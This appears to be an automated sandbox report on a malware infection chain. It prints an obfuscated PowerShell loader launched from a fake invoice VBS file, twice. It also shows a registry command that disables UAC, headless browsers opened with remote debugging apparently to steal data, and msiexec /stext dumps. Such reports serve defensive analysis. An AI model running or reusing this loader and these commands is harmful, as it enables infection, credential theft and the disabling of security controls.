PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\detalhe_fatura_20241105·pd.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#tervaderne Sejlklar Dispensative Synocreate Specialdepot #><#Rverhistorier Nonbreakable Warnas Prodders Prpositionsled #>$Dvekonsulenterne='Infiltrende';function Faglrereksaminernes($Militrpolitis){If ($host.DebuggerEnabled) {$Fiskerets++;$Rdbyerne=$Militrpolitis.'Length' - $Fiskerets} for ( $Episodial=4;$Episodial -lt $Rdbyerne;$Episodial+=5){$Yndlingsudtrykkets=$Episodial;$Checksumberegningen+=$Militrpolitis[$Episodial]}$Checksumberegningen}function husmandsbruget($Unvague){ .($Quersprung) ($Unvague)}$Unconfirmed=Faglrereksaminernes ' ariN Sa eVrnetSla,. Gisw IndEUnpubChefC BehL,elei ageHundnT leTDisp ';$Strandlooper=Faglrereksaminernes 'FulgMInteoUnl zmi.li ba lBel.lFriaa ,vi/coun ';$Bacillariaceous=Faglrereksaminernes 'AfgiTredilBunks upe1Paaf2V.lu ';$Alchimy='Park[SmdeN PoleDokbtOph .Proks CyceObliRSwirv aaniTyphCIntre.arbP A,to Elei SkeN P,atVildmNi raInteNKnbja RefgStoleRecoRIsla]Arch:Batt:F,scSovereDesucismeU Fo RMisaIAnsttFln YUn rpN nrRF isORamotT,eioRelicIraooJubjlInfl=Chin$.onmBForsaPersCspagiPr pLDokul BosaSc.prArc.i H pA Folc Mode .usOPsy,u.xpeSInte ';$Strandlooper+=Faglrereksaminernes 'Caes5Sven. Da,0Gaar Koll(cankWAl miSween SesdSf ro HakwSla,sMicr C agNUnheTLaan Une1Li j0Sind.Fuld0Pe,l;Hypo ImprWAci io.ernBo.e6Brdr4V rm; A o SilvxVanm6unde4 Obv; Che ChrerMo svFors: Non1N nc3Fleu1Shit.Nagg0Maco)Yndi SekuGac neFinec EntkIn qoMes /Tryk2Tvrd0 Ura1Woo 0 Con0Lok 1Part0Sy r1Brne ,hiFAr eiTrocrAb neEst f K.eo BesxSynd/Indk1Goor3Fen 1Gono..ogd0 Tam ';$Nondifficult76=Faglrereksaminernes ' .yaULionsS.alEPetiRSple-,igeaP nnGStareCautNSuggt dio ';$Beskrivelser=Faglrereksaminernes ' N dhSaa tHippt Batp uldsTrdo: ntu/Art /Hea.dFa rr HaeiAutovFu ieTare.Eng g ello Pr oAnalg MaclSpore wor.T lgc olyoRipem orr/StueuCondc,ymp?Pisse PouxAfl,pTe roCoenrBi ttstro=K radTa,roLnstwPhiln OvelAriso BevaRevedUdle&ChemiNe.rdpo,b=Dspe1 ProbhypnaIn,eZDoor0GradlAnfrZDismf GumeFremkSt ij AfdsSlagpYe,iVOperJFor.l St,qMeekySvo p rojyDaleHM,saF Bog2RowdYVaidiSlag_RuntuFir,VparkwIlliIMarkyBlue0Conti Bao ';$Bispevielse=Faglrereksaminernes 'Unpr>Gift ';$Quersprung=Faglrereksaminernes 'MillIVitreClasXTil ';$skudefuldes='Clysmian';$Skibsbestningerne='\Finansieringsreglen.Obj';husmandsbruget (Faglrereksaminernes 'Es e$KingGVrtslPseuO ypb udA EvaLVer :BundINel NM,lidF kssAtlaLMiniURepts Ubee plsdChorEUnwiSPara=Dr j$CheaEE,goNVeriv Co :MammA.nitpSpiopBrndDWithaSmukTbec aGlun+Biom$ olosSvinKPae IPe ibAlu sSup B Af,EAnsiS Vk.tK den Be.iReccnP ckgSik EUpaar Cenn tyrEGges ');husmandsbruget (Faglrereksaminernes ' St,$FlleGSu plTredOSubcbB ndafor lS jt:Ma.ku .jepInfaGGan,i ectrLetsD U aIudson M.lGBars=Stud$ lutb utoeKvansfjasK emer aksi TamvSyn EMaksL UnvSUdseESkraRThal.E.asSperlPBe,eLFo.miPlustfisk( imb$DdelBLrerIromaSDiskpUph,eTrauvUnd icanoeAural Sans UndEpost)Uros ');husmandsbruget (Faglrereksaminernes $Alchimy);$Beskrivelser=$upgirding[0];$Calami=(Faglrereksaminernes 'Mose$SkrugMeroLSvenoPikebJomfAKa aLAlgo:gipsbNe,ro LacNDe lDAceteCha sTeksLDe.egUdbytAfls= K.aN BuneMiliwSide-DebaoAnd bVa.sJFordEI,reCZinkTLivs Un s RenYDiscs ritT ulte Kopmmn,p.Krit$ CarUStennYnkscAgroo.nreNSanaF BimI FrdRVerdMHatheLithdVang ');husmandsbruget ($Calami);husmandsbruget (Faglrereksaminernes 'e pe$MaarBTrs oT.ddn Abed No eB.ansSonalVejvghexatInte.,ayoH avkeIndiaU ymdtilse S,vrRgtesCorr[L eh$svenNTrygoMa anSterdKarai MasfKlorfLoriiH.pncobtuuMololBrydtdev 7T ki6Ensn]Ph s=kvit$ PedSPhl,tCommrprogaF amnSvendnedslB wioHv loDestpNaa.eTy srbed, ');$Drollness=Faglrereksaminernes ' Rhe$Lym,BR,looConfnAfmad KaleFr ssV.ekl SprgChritcal..ForpDF iko kifwLurrnIn elBibcodereaSpatdInfeF CatiStarl Fore Ina(Nonr$ asyBHeare.lumsNyttkAudirKonsiNo pv L leImmilStunsHe neStemrEver,Afmi$Hjn E .omr Vany aat onrh Refr BiooTabud uldeY.utgPrepeud lnca hebordrLuc.aGaertRepli ,oevRecueOver)vet. ';$Erythrodegenerative=$Indslusedes;husmandsbruget (Faglrereksaminernes '.rne$ kvaGBir,LU,gao Ma bS orA haeLBibl: JibasponDAirlmBefoi rayRPo uA TvilStipSSkurUSmaaN,oshi K rF OveO blirInd,mJamisG os=Golk(KatoTb grEFamiSMarcTC.to- StuPKaffap osTLufthF gb Told$epene ecrrAkkiyStiftEr tHheatrCrewoVerid KavEJuragRav eTandnSo,vEHoldR F nA T nTEtabi FaiVS.rbESyph)unde ');while (!$Admiralsuniforms) {husmandsbruget (Faglrereksaminernes 'Mult$Sophg paulurocoI,subTepiaBevilMego:EfteDStyri atesApp kFradk ortaA ndpDyrta incc.egriSerpt Op efemitChuteDamen DessAnke=.cce$SkibtSnedrChafuPas eUnap ') ;husmandsbruget $Drollness;husmandsbruget (Faglrereksaminernes ' Ac Sbel.T C oA I fr KurtA.kl-CelisNikklBromE.roneAnespTele Brn4opt ');husmandsbruget (Faglrereksaminernes 'S,rg$Bla,GBedmlCoolo rrebTilrA Ejal Pac:C,mpAAfstDR.bsmPe,fIAfbiRH,ala CasL Hoes U eU dmynSaltI eawfDo,bOMiddRPhy MbefaSGr s= fv( MirT IntELampS AppTSpi - DegpDem A JocTCr sH Si, Bio $Col ESuper L nYUdg.TNonohMos,RDisto avtdMettE NemG loeGimmnWeekeHardRassoAAfgaTPr bIPenaVReprE Zir)bee ') ;husmandsbruget (Faglrereksaminernes 'Taag$ichtGBesmlUdd.oForsBPilaaHomol Ejs: ontBUnt LB atOForocZoogk ba.A MisDDipleMassr erd=Spar$PhotGBurkLBaltoVol BDebeAB lsLIndt:c onjFnugokap.m HasfBedrRRefeUMealkVesiLHypsoProts,epeTTavee,lubr St.+ com+ ha% Mo $FascU RelpTe,aG pipIAfkorAa sDTyfoIFauvnG regBogk. Epac LexOE.chUBracNJenntDe o ') ;$Beskrivelser=$upgirding[$Blockader]}$Understemmer=312115;$Leafiest15=31157;husmandsbruget (Faglrereksaminernes 'Send$,pargTerpLTalgo HisbFr ta bilLFila:Siess SupuPargpInd P PrirMyldiSubsmPhoteLegiRVverI uronVentgUdsi sta.=Byba SketGStarEK,altProp- LblCPostoQuinnDarttWalleRayaNVinrtSkr Scru$P trEs mir A byRoomtl.seHturbRHippOPatrdhalvEkbssg GenESwinNUs.fESer.rSym.ATrigT eni swavConieSal ');husmandsbruget (Faglrereksaminernes 'Stem$Clung istlFl,soAntibRefoaCounl yke:rrf AT.amuOptispen tSt krO tba pirl.ortoPhotp.orciKon tV,llhOlioeAto.cErobilysensjleaRekoe Sur .rch=Indd R s[TollS OveyKvi.sUn vt Udse Po mSamm.landC frooSubcnW atvRepreNonprPosttDist]Gard:A.ab:An iFUdhurTreeotu nm tyrBWoodaS nssAflgeShog6Evan4Sq.iSFrent,dskr Beni DkknIrregHuch( el$grssS NonuHo,epE trp edlrTmtbiSycomTeste ushrBrohiEscrnPramgYend)S ef ');husmandsbruget (Faglrereksaminernes 'Var $LawbgAddeL opaOEnkeBEspaAFyldLKant:Oilpk IntaUns mHyklmDatae marRGeneh d.sE HutRCompRVaa EGradsBrom I.dp=Br b Sl [Toi SAnemyVivis D.sTSmaaE RelmAger.RegrTBagteBohmxmuniT Van.De iESebkNMor.C hakO HanDSiloiSuriNUdbeg an] Hoe:,icr:E.paaCo pSSto cJaimiOkseI Bol. .raG OppESowaTKostsBlvetak iRFagfi BloNResoGRoto(Frke$AkkuaAnstuOb eSFroptAm rRZ,nta S iLVldeO.yonP IrrIAfstTPe.sHTandERu.fC al iT.ngNSysta TarE Eco) ha ');husmandsbruget (Faglrereksaminernes 'Un e$ T nGRe.uL LocoPan b .abaSlutlCast:H ltAPre.S TreT Elir,lepoDow lUncoOR kkgSkrk=Flor$ ranKMaria B om EvaMMispeLnkoRf.glhTekneUdk,R nfor,emoEKvalsUdsa. f mS elrUMastbOleaSFjleTAfvirSbehIHav.NMandGGri (Typ.$AfkluCirkNbegydTwi,EThorrC.ess,avsTPlanE eatMHypomB tae FalRTvrm, Dam$KoallBogsESterA sblf,uraI SaleBorgS MidTForv1 ip5Supe)Mini ');husmandsbruget $Astrolog;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#tervaderne Sejlklar Dispensative Synocreate Specialdepot #><#Rverhistorier Nonbreakable Warnas Prodders Prpositionsled #>$Dvekonsulenterne='Infiltrende';function Faglrereksaminernes($Militrpolitis){If ($host.DebuggerEnabled) {$Fiskerets++;$Rdbyerne=$Militrpolitis.'Length' - $Fiskerets} for ( $Episodial=4;$Episodial -lt $Rdbyerne;$Episodial+=5){$Yndlingsudtrykkets=$Episodial;$Checksumberegningen+=$Militrpolitis[$Episodial]}$Checksumberegningen}function husmandsbruget($Unvague){ .($Quersprung) ($Unvague)}$Unconfirmed=Faglrereksaminernes ' ariN Sa eVrnetSla,. Gisw IndEUnpubChefC BehL,elei ageHundnT leTDisp ';$Strandlooper=Faglrereksaminernes 'FulgMInteoUnl zmi.li ba lBel.lFriaa ,vi/coun ';$Bacillariaceous=Faglrereksaminernes 'AfgiTredilBunks upe1Paaf2V.lu ';$Alchimy='Park[SmdeN PoleDokbtOph .Proks CyceObliRSwirv aaniTyphCIntre.arbP A,to Elei SkeN P,atVildmNi raInteNKnbja RefgStoleRecoRIsla]Arch:Batt:F,scSovereDesucismeU Fo RMisaIAnsttFln YUn rpN nrRF isORamotT,eioRelicIraooJubjlInfl=Chin$.onmBForsaPersCspagiPr pLDokul BosaSc.prArc.i H pA Folc Mode .usOPsy,u.xpeSInte ';$Strandlooper+=Faglrereksaminernes 'Caes5Sven. Da,0Gaar Koll(cankWAl miSween SesdSf ro HakwSla,sMicr C agNUnheTLaan Une1Li j0Sind.Fuld0Pe,l;Hypo ImprWAci io.ernBo.e6Brdr4V rm; A o SilvxVanm6unde4 Obv; Che ChrerMo svFors: Non1N nc3Fleu1Shit.Nagg0Maco)Yndi SekuGac neFinec EntkIn qoMes /Tryk2Tvrd0 Ura1Woo 0 Con0Lok 1Part0Sy r1Brne ,hiFAr eiTrocrAb neEst f K.eo BesxSynd/Indk1Goor3Fen 1Gono..ogd0 Tam ';$Nondifficult76=Faglrereksaminernes ' .yaULionsS.alEPetiRSple-,igeaP nnGStareCautNSuggt dio ';$Beskrivelser=Faglrereksaminernes ' N dhSaa tHippt Batp uldsTrdo: ntu/Art /Hea.dFa rr HaeiAutovFu ieTare.Eng g ello Pr oAnalg MaclSpore wor.T lgc olyoRipem orr/StueuCondc,ymp?Pisse PouxAfl,pTe roCoenrBi ttstro=K radTa,roLnstwPhiln OvelAriso BevaRevedUdle&ChemiNe.rdpo,b=Dspe1 ProbhypnaIn,eZDoor0GradlAnfrZDismf GumeFremkSt ij AfdsSlagpYe,iVOperJFor.l St,qMeekySvo p rojyDaleHM,saF Bog2RowdYVaidiSlag_RuntuFir,VparkwIlliIMarkyBlue0Conti Bao ';$Bispevielse=Faglrereksaminernes 'Unpr>Gift ';$Quersprung=Faglrereksaminernes 'MillIVitreClasXTil ';$skudefuldes='Clysmian';$Skibsbestningerne='\Finansieringsreglen.Obj';husmandsbruget (Faglrereksaminernes 'Es e$KingGVrtslPseuO ypb udA EvaLVer :BundINel NM,lidF kssAtlaLMiniURepts Ubee plsdChorEUnwiSPara=Dr j$CheaEE,goNVeriv Co :MammA.nitpSpiopBrndDWithaSmukTbec aGlun+Biom$ olosSvinKPae IPe ibAlu sSup B Af,EAnsiS Vk.tK den Be.iReccnP ckgSik EUpaar Cenn tyrEGges ');husmandsbruget (Faglrereksaminernes ' St,$FlleGSu plTredOSubcbB ndafor lS jt:Ma.ku .jepInfaGGan,i ectrLetsD U aIudson M.lGBars=Stud$ lutb utoeKvansfjasK emer aksi TamvSyn EMaksL UnvSUdseESkraRThal.E.asSperlPBe,eLFo.miPlustfisk( imb$DdelBLrerIromaSDiskpUph,eTrauvUnd icanoeAural Sans UndEpost)Uros ');husmandsbruget (Faglrereksaminernes $Alchimy);$Beskrivelser=$upgirding[0];$Calami=(Faglrereksaminernes 'Mose$SkrugMeroLSvenoPikebJomfAKa aLAlgo:gipsbNe,ro LacNDe lDAceteCha sTeksLDe.egUdbytAfls= K.aN BuneMiliwSide-DebaoAnd bVa.sJFordEI,reCZinkTLivs Un s RenYDiscs ritT ulte Kopmmn,p.Krit$ CarUStennYnkscAgroo.nreNSanaF BimI FrdRVerdMHatheLithdVang ');husmandsbruget ($Calami);husmandsbruget (Faglrereksaminernes 'e pe$MaarBTrs oT.ddn Abed No eB.ansSonalVejvghexatInte.,ayoH avkeIndiaU ymdtilse S,vrRgtesCorr[L eh$svenNTrygoMa anSterdKarai MasfKlorfLoriiH.pncobtuuMololBrydtdev 7T ki6Ensn]Ph s=kvit$ PedSPhl,tCommrprogaF amnSvendnedslB wioHv loDestpNaa.eTy srbed, ');$Drollness=Faglrereksaminernes ' Rhe$Lym,BR,looConfnAfmad KaleFr ssV.ekl SprgChritcal..ForpDF iko kifwLurrnIn elBibcodereaSpatdInfeF CatiStarl Fore Ina(Nonr$ asyBHeare.lumsNyttkAudirKonsiNo pv L leImmilStunsHe neStemrEver,Afmi$Hjn E .omr Vany aat onrh Refr BiooTabud uldeY.utgPrepeud lnca hebordrLuc.aGaertRepli ,oevRecueOver)vet. ';$Erythrodegenerative=$Indslusedes;husmandsbruget (Faglrereksaminernes '.rne$ kvaGBir,LU,gao Ma bS orA haeLBibl: JibasponDAirlmBefoi rayRPo uA TvilStipSSkurUSmaaN,oshi K rF OveO blirInd,mJamisG os=Golk(KatoTb grEFamiSMarcTC.to- StuPKaffap osTLufthF gb Told$epene ecrrAkkiyStiftEr tHheatrCrewoVerid KavEJuragRav eTandnSo,vEHoldR F nA T nTEtabi FaiVS.rbESyph)unde ');while (!$Admiralsuniforms) {husmandsbruget (Faglrereksaminernes 'Mult$Sophg paulurocoI,subTepiaBevilMego:EfteDStyri atesApp kFradk ortaA ndpDyrta incc.egriSerpt Op efemitChuteDamen DessAnke=.cce$SkibtSnedrChafuPas eUnap ') ;husmandsbruget $Drollness;husmandsbruget (Faglrereksaminernes ' Ac Sbel.T C oA I fr KurtA.kl-CelisNikklBromE.roneAnespTele Brn4opt ');husmandsbruget (Faglrereksaminernes 'S,rg$Bla,GBedmlCoolo rrebTilrA Ejal Pac:C,mpAAfstDR.bsmPe,fIAfbiRH,ala CasL Hoes U eU dmynSaltI eawfDo,bOMiddRPhy MbefaSGr s= fv( MirT IntELampS AppTSpi - DegpDem A JocTCr sH Si, Bio $Col ESuper L nYUdg.TNonohMos,RDisto avtdMettE NemG loeGimmnWeekeHardRassoAAfgaTPr bIPenaVReprE Zir)bee ') ;husmandsbruget (Faglrereksaminernes 'Taag$ichtGBesmlUdd.oForsBPilaaHomol Ejs: ontBUnt LB atOForocZoogk ba.A MisDDipleMassr erd=Spar$PhotGBurkLBaltoVol BDebeAB lsLIndt:c onjFnugokap.m HasfBedrRRefeUMealkVesiLHypsoProts,epeTTavee,lubr St.+ com+ ha% Mo $FascU RelpTe,aG pipIAfkorAa sDTyfoIFauvnG regBogk. Epac LexOE.chUBracNJenntDe o ') ;$Beskrivelser=$upgirding[$Blockader]}$Understemmer=312115;$Leafiest15=31157;husmandsbruget (Faglrereksaminernes 'Send$,pargTerpLTalgo HisbFr ta bilLFila:Siess SupuPargpInd P PrirMyldiSubsmPhoteLegiRVverI uronVentgUdsi sta.=Byba SketGStarEK,altProp- LblCPostoQuinnDarttWalleRayaNVinrtSkr Scru$P trEs mir A byRoomtl.seHturbRHippOPatrdhalvEkbssg GenESwinNUs.fESer.rSym.ATrigT eni swavConieSal ');husmandsbruget (Faglrereksaminernes 'Stem$Clung istlFl,soAntibRefoaCounl yke:rrf AT.amuOptispen tSt krO tba pirl.ortoPhotp.orciKon tV,llhOlioeAto.cErobilysensjleaRekoe Sur .rch=Indd R s[TollS OveyKvi.sUn vt Udse Po mSamm.landC frooSubcnW atvRepreNonprPosttDist]Gard:A.ab:An iFUdhurTreeotu nm tyrBWoodaS nssAflgeShog6Evan4Sq.iSFrent,dskr Beni DkknIrregHuch( el$grssS NonuHo,epE trp edlrTmtbiSycomTeste ushrBrohiEscrnPramgYend)S ef ');husmandsbruget (Faglrereksaminernes 'Var $LawbgAddeL opaOEnkeBEspaAFyldLKant:Oilpk IntaUns mHyklmDatae marRGeneh d.sE HutRCompRVaa EGradsBrom I.dp=Br b Sl [Toi SAnemyVivis D.sTSmaaE RelmAger.RegrTBagteBohmxmuniT Van.De iESebkNMor.C hakO HanDSiloiSuriNUdbeg an] Hoe:,icr:E.paaCo pSSto cJaimiOkseI Bol. .raG OppESowaTKostsBlvetak iRFagfi BloNResoGRoto(Frke$AkkuaAnstuOb eSFroptAm rRZ,nta S iLVldeO.yonP IrrIAfstTPe.sHTandERu.fC al iT.ngNSysta TarE Eco) ha ');husmandsbruget (Faglrereksaminernes 'Un e$ T nGRe.uL LocoPan b .abaSlutlCast:H ltAPre.S TreT Elir,lepoDow lUncoOR kkgSkrk=Flor$ ranKMaria B om EvaMMispeLnkoRf.glhTekneUdk,R nfor,emoEKvalsUdsa. f mS elrUMastbOleaSFjleTAfvirSbehIHav.NMandGGri (Typ.$AfkluCirkNbegydTwi,EThorrC.ess,avsTPlanE eatMHypomB tae FalRTvrm, Dam$KoallBogsESterA sblf,uraI SaleBorgS MidTForv1 ip5Supe)Mini ');husmandsbruget $Astrolog;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\Chrome.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff70abcc40,0x7fff70abcc4c,0x7fff70abcc58

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\jdwblvahxqurzoaz"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\jdwblvahxqurzoaz"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\txclmnkjlymebcwdxqa"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\txclmnkjlymebcwdxqa"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\txclmnkjlymebcwdxqa"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\wrhengddzgejmikhhbvivc"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1992,i,12248935928065961960,2414336146632246934,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1988 /prefetch:2

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1832,i,12248935928065961960,2414336146632246934,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2152 /prefetch:3

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2180,i,12248935928065961960,2414336146632246934,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2360 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3176,i,12248935928065961960,2414336146632246934,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3204,i,12248935928065961960,2414336146632246934,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3332 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4616,i,12248935928065961960,2414336146632246934,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4568,i,12248935928065961960,2414336146632246934,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4560 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4276,i,12248935928065961960,2414336146632246934,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4856 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fff709746f8,0x7fff70974708,0x7fff70974718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,16482620790005200904,4844294344450747913,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2

